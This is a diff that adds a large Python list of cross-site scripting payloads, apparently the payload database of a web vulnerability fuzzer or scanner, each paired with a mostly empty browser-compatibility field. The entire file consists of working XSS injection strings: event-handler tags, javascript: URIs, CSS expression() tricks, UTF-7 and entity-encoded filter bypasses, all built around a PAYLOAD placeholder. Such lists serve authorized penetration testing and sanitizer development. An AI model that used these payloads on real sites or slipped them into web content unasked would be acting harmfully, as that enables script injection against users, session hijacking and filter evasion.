+        { 'payload':'''<a/href="javascript:&#13; javascript:prompt(PAYLOAD)"><input type="X">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javascript%3A:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javascript%3Ajavascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javascript#alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javascript:alert(PAYLOAD)">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="jAvAsCrIpT&colon;alert&lpar;PAYLOAD&rpar;">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(PAYLOAD)&NewLine;>X</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href=x onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''</a onmousemove="alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''</a onmousemove=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a onmouseover=(alert(PAYLOAD))>Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<applet onerror applet onerror="javascript:javascript:alert(PAYLOAD)"></applet onerror>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<applet onError applet onError="javascript:javascript:alert(PAYLOAD)"></applet onError>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(PAYLOAD)"></applet onreadystatechange>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(PAYLOAD)"></applet onReadyStateChange>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<article xmlns="><img src=x onerror=alert(PAYLOAD)"></article>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<article xmlns="x:img src=x onerror=alert(PAYLOAD) ">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="behavior:url(#Zault#AnchorClick);" folder="javascript:alert(PAYLOAD)">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="behavior:url(#Zault#AnchorClick);" folder="javascript:javascript:alert(PAYLOAD)">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="-o-link:'javascript:alert(PAYLOAD)';-o-link-source:current">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="-o-link:'javascript:javascript:alert(PAYLOAD)';-o-link-source:current">Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(PAYLOAD);">Y</a></a><a href="javascript:alert(PAYLOAD)">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(PAYLOAD);">Y</a></a><a href="javascript:javascript:alert(PAYLOAD)">Y</a><style>*[{}@import'%25(css)s?]</style>X''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<audio src=1 href=1 onerror="javascript:alert(PAYLOAD)"></audio>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<audio src=1 onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BASE HREF="javascript:alert(PAYLOAD);//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BASE HREF="javascript:alert('PAYLOAD');//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BASE HREF="javascript:javascript:alert(PAYLOAD);//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<bgsound onpropertychange=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(PAYLOAD)"></bgsound onPropertyChange>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BGSOUND SRC="javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BGSOUND SRC="javascript:alert('PAYLOAD');">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BGSOUND SRC="javascript:javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.Y(document.getElementById('id1').getAttribute('x'))) { alert(PAYLOAD);}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.Y(document.getElementById('id1').getAttribute('x'))) { alert(PAYLOAD);}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BODY BACKGROUND="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BODY BACKGROUND="javascript:alert('PAYLOAD')">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body> §iframe onload=confirm(/PAYLOAD/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onactivate=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onbeforeactivate=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onbeforeunload body onbeforeunload="javascript:javascript:alert(PAYLOAD)"></body onbeforeunload>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(PAYLOAD)"></body onBeforeUnload>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onblur body onblur="javascript:javascript:alert(PAYLOAD)"></body onblur>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onfocus body onfocus="javascript:javascript:alert(PAYLOAD)"></body onfocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onFocus body onFocus="javascript:javascript:alert(PAYLOAD)"></body onFocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onfocusin=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body oninput=alert(PAYLOAD)><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body oninput=javascript:alert(PAYLOAD)><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body oninput=prompt(PAYLOAD)><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onkeydown body onkeydown="javascript:javascript:alert(PAYLOAD)"></body onkeydown>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onkeyup body onkeyup="javascript:javascript:alert(PAYLOAD)"></body onkeyup>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\"><body onload=\"PAYLOAD\">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\\\'><body onload=\\\'PAYLOAD\\\'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body/onload=<!-->&#10alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onload="alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onload="alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BODY ONLOAD=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BODY ONLOAD=alert('PAYLOAD')>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onload body onload="javascript:javascript:alert(PAYLOAD)"></body onload>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onLoad body onLoad="javascript:javascript:alert(PAYLOAD)"></body onLoad>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BODY ONLOAD=javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<BODY ONLOAD=javascript:javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"><body onload="PAYLOAD">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\'><body onload=\'PAYLOAD\'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onMouseEnter body onMouseEnter="javascript:javascript:alert(PAYLOAD)"></body onMouseEnter>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onMouseMove body onMouseMove="javascript:javascript:alert(PAYLOAD)"></body onMouseMove>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onMouseOver body onMouseOver="javascript:javascript:alert(PAYLOAD)"></body onMouseOver>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onpagehide body onpagehide="javascript:javascript:alert(PAYLOAD)"></body onpagehide>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onPageHide body onPageHide="javascript:javascript:alert(PAYLOAD)"></body onPageHide>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onPageShow body onPageShow="javascript:javascript:alert(PAYLOAD)"></body onPageShow>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onPopState body onPopState="javascript:javascript:alert(PAYLOAD)"></body onPopState>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onPropertyChange body onPropertyChange="javascript:javascript:alert(PAYLOAD)"></body onPropertyChange>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onResize body onResize="javascript:javascript:alert(PAYLOAD)"></body onResize>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onscroll=alert(PAYLOAD)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onscroll=alert(PAYLOAD)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onscroll=alert(PAYLOAD)><br><br>...<br><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onscroll=javascript:alert(PAYLOAD)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onscroll=javascript:alert(PAYLOAD)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onscroll=prompt(PAYLOAD)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onunload body onunload="javascript:javascript:alert(PAYLOAD)"></body onunload>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<body onUnload body onUnload="javascript:javascript:alert(PAYLOAD)"></body onUnload>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<button/onclick=alert(PAYLOAD) >Y</button>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<comment><img src="</comment><img src=x onerror=alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<comment><img src="</comment><img src=x onerror=alert(PAYLOAD))//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<comment><img src="</comment><img src=x onerror=javascript:alert(PAYLOAD))//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<comment><img src="</comment><img src=x onerror=prompt(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div class="foo1">Y</div> <script>document.getElementsByClassName('foo1')[0]?alert(PAYLOAD):0</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div id=d><x xmlns="><iframe onload=alert(PAYLOAD)"></div> <script>d.innerHTML=d.innerHTML</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div id=d><x xmlns="><iframe onload=javascript:alert(PAYLOAD)"></div> <script>d.innerHTML=d.innerHTML</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#Zault#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img&#11;src=x:x&#11;onerror&#11;=javascript:alert(PAYLOAD)>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div onmouseover="alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div/onmouseover='alert(PAYLOAD)'> style="x:">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div onmouseover='alert&lpar;PAYLOAD&rpar;'>DIV</div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="background-image: url(&#1;javascript:alert(PAYLOAD))">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="background-image: url(&#1;javascript:alert('PAYLOAD'))">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="background-image: url(javascript:alert(PAYLOAD););">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="background-image: url(javascript:alert(PAYLOAD))">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="background-image: url(javascript:alert('PAYLOAD'))">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="background-image: url(javascript:javascript:alert(PAYLOAD))">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="color:red'{} x:expression(alert(PAYLOAD))">.</div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="Y:expression(alert(PAYLOAD))'"></div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="Y:expression(alert(PAYLOAD))"></div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="Y:expression(alert(PAYLOAD))\"></div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="Y:expression(alert(PAYLOAD))">Y/div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="list-style:url(http://foo.f)\20url(javascript:alert(PAYLOAD));">X</div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(PAYLOAD));">X''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div  style="position:absolute;top:0;left:0;width:100%25;height:100%25"  onmouseover="prompt(PAYLOAD)" onclick="alert(PAYLOAD)">x</button>​''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(PAYLOAD)" onclick="alert(PAYLOAD)">x</button>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=alert(PAYLOAD)>x</div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=javascript:alert(PAYLOAD)>x''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=prompt(PAYLOAD)>x</div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="width: expression(alert(PAYLOAD););">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="width: expression(alert(PAYLOAD));">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="width: expression(alert('PAYLOAD'));">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<div/style="width:expression(confirm(PAYLOAD))">X</div>''',
+          'browser':"""[IE7]"""},
+        { 'payload':'''<DIV STYLE="width:expression(javascript:alert(PAYLOAD));">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''%E0<body onload=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<embed code=javascript:javascript:alert(PAYLOAD);></embed>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<embed src="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<embed src=javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(PAYLOAD)'/&#x3E;">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<event-source src="%25(event)s" onload="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<event-source src=javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''exp/*<A STYLE='no\Y:noY("*//*");Y:&#101;x&#x2F;*Y*//*/*/pression(alert(PAYLOAD))'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''exp/*<A STYLE='no\Y:noY("*//*");Y:ex/*Y*//*/*/pression(alert("PAYLOAD"))'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(PAYLOAD)>'</font>/</style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''foo%00<script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<! foo="><script>alert(PAYLOAD)</script>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<? foo="><script>alert(PAYLOAD)</script>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''</ foo="><script>alert(PAYLOAD)</script>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<! foo="><script>javascript:alert(PAYLOAD)</script>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<? foo="><script>javascript:alert(PAYLOAD)</script>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''</ foo="><script>javascript:alert(PAYLOAD)</script>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<? foo="><x foo='?><script>alert(PAYLOAD)</script>'>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<%25 foo><x foo="%25><script>alert(PAYLOAD)</script>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<? foo="><x foo='?><script>javascript:alert(PAYLOAD)</script>'>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<%25 foo><x foo="%25><script>javascript:alert(PAYLOAD)</script>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><a href="javascript:%0061lert&#x28;PAYLOAD&#x29;">Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><button formaction="javascript:alert(PAYLOAD)">Y</button>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><button formaction=javascript&colon;alert(PAYLOAD)>Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><button formaction=javascript&colon;alert(PAYLOAD)>Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><button formaction="javascript:javascript:alert(PAYLOAD)">X''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form id=Y /><button form=Y formaction=javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form id="Y" /><button form="Y" formaction="javascript:alert(PAYLOAD)">X''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form id="Y" /><button form="Y" formaction="javascript:javascript:alert(PAYLOAD)">X''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form id="Y"></form><button form="Y" formaction="javascript:alert(PAYLOAD)">X</button>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form id=Y onforminput=javascript:alert(PAYLOAD)><input></form><button form=Y onformchange=javascript:alert(PAYLOAD)>X''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form id=Y onforminput=prompt(PAYLOAD)><input></form><button form=Y onformchange=prompt(PAYLOAD)>X</button>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(PAYLOAD)"&#11;&#10;&#09;;>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><isindex formaction="javascript&colon;confirm(PAYLOAD)"''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form name=self location="javascript&#58;alert(PAYLOAD)"></form><script>if(top!=self){ top.location=self.location}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form name=self location="javascript&#58;alert(PAYLOAD)"></form><script>if(top!=self){top.location=self.location}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form name=self location="javascript:alert(PAYLOAD)"></form><script>if(top!=self){ top.location=self.location}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form name=self location="javascript:alert(PAYLOAD)"></form><script>if(top!=self){top.location=self.location}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><textarea &#13; onkeyup='%0061%006C%0065%0072%0074&#x28;PAYLOAD&#x29;'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<FRAMESET><FRAME SRC="javascript:alert(PAYLOAD);"></FRAMESET>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<FRAMESET><FRAME SRC="javascript:alert('PAYLOAD');"></FRAMESET>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<FRAMESET><FRAME SRC="javascript:javascript:alert(PAYLOAD);"></FRAMESET>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onBlur frameset onBlur="javascript:javascript:alert(PAYLOAD)"></frameset onBlur>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onFocus frameset onFocus="javascript:javascript:alert(PAYLOAD)"></frameset onFocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onload=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onload=javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onload=javascript:javascript:alert(PAYLOAD)></frameset>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onload=prompt(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onScroll frameset onScroll="javascript:javascript:alert(PAYLOAD)"></frameset onScroll>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''?#?gad=xxxx"onload="alert(PAYLOAD)"''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''/#?gad=xxxx"onload="alert(PAYLOAD)"''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''#?gad=xxxx"onload="alert(PAYLOAD)"''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<head><base href="javascript://"/></head><body><a href="/. /,alert(PAYLOAD)//#">XXX</a></body>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(PAYLOAD)//#">Y</a></body>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(PAYLOAD);+ADw-/SCRIPT+AD4-''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('PAYLOAD');+ADw-/SCRIPT+AD4-''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%25(PAYLOAD)s;+ADw-/SCRIPT+AD4-''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#Zault#time2"><t:set attributeName="innerHTML" to="Y<SCRIPT ZER>javascript:alert(PAYLOAD)</SCRIPT>"></BODY></HTML>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseDown html onMouseDown="javascript:javascript:alert(PAYLOAD)"></html onMouseDown>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(PAYLOAD)"></html onMouseEnter>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseLeave html onMouseLeave="javascript:javascript:alert(PAYLOAD)"></html onMouseLeave>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onmousemove html onmousemove="javascript:javascript:alert(PAYLOAD)"></html onmousemove>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseMove html onMouseMove="javascript:javascript:alert(PAYLOAD)"></html onMouseMove>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseOut html onMouseOut="javascript:javascript:alert(PAYLOAD)"></html onMouseOut>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onmouseover html onmouseover="javascript:javascript:alert(PAYLOAD)"></html onmouseover>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseOver html onMouseOver="javascript:javascript:alert(PAYLOAD)"></html onMouseOver>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseUp html onMouseUp="javascript:javascript:alert(PAYLOAD)"></html onMouseUp>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseWheel html onMouseWheel="javascript:javascript:alert(PAYLOAD)"></html onMouseWheel>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''htmlStr = '<a href="javascript:alert(PAYLOAD)">Y</a>'; document.getElementById('body').innerHTML = htmlStr; try { alert(PAYLOAD);}catch(e){alert(PAYLOAD);};''',
+          'browser':"""[Not Info]"""},
+    { 'payload':'''htmlStr = '<a href="javascript:alert(PAYLOAD)">Y</a>'; document.getElementById('body').innerHTML = htmlStr; try { if(document.getElementById('body').firstChild.protocol === 'javascript:') { alert(PAYLOAD); } }catch(e){alert(PAYLOAD);};''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<HTML xmlns:Y><?import namespace="Y" implementation="%25(htc)s"><Y:Y>Y</Y:Y></HTML>""","XML namespace."),("""<XML ID="Y"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(PAYLOAD)"></B></I></XML><SPAN DATASRC="#Y" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''http://%22%20onerror=%22alert%28PAYLOAD%29;//''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''http://www.<script>alert(PAYLOAD)</script .com''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--[if gte IE 4]><SCRIPT>alert(PAYLOAD);</SCRIPT><![endif]-->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--[if gte IE 4]><SCRIPT>javascript:alert(PAYLOAD);</SCRIPT><![endif]-->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--[if<img src=x onerror=alert(PAYLOAD)//]> -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--[if<img src=x onerror=javascript:alert(PAYLOAD)//]> -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/%00/ src=javaSCRIPT&colon;alert(PAYLOAD)''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe %00 src="&Tab;javascript:prompt(PAYLOAD)&Tab;"%00>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(PAYLOAD)"></iframe onbeforeload>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe "onload=alert(PAYLOAD)></iframe>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/ /onload=alert(PAYLOAD)></iframe>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/ "onload=alert(PAYLOAD)></iframe>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe///////onload=alert(PAYLOAD)></iframe>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onload iframe onload="javascript:javascript:alert(PAYLOAD)"></iframe onload>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onLoad iframe onLoad="javascript:javascript:alert(PAYLOAD)"></iframe onLoad>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/onreadystatechange=%0061%006C%0065%0072%0074('%006PAYLOAD') worksinIE>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onreadystatechange=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/onreadystatechange=alert(PAYLOAD)''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(PAYLOAD)"></iframe onReadyStateChange>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe srcdoc='<body onload=prompt&lpar;PAYLOAD&rpar;>'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe srcdoc="&LT;iframe&sol;srcdoc=&lt;img&sol;src=&apos;&apos;onerror=javascript:alert(PAYLOAD)&gt;>">''',
+          'browser':"""[Not Info]"""},
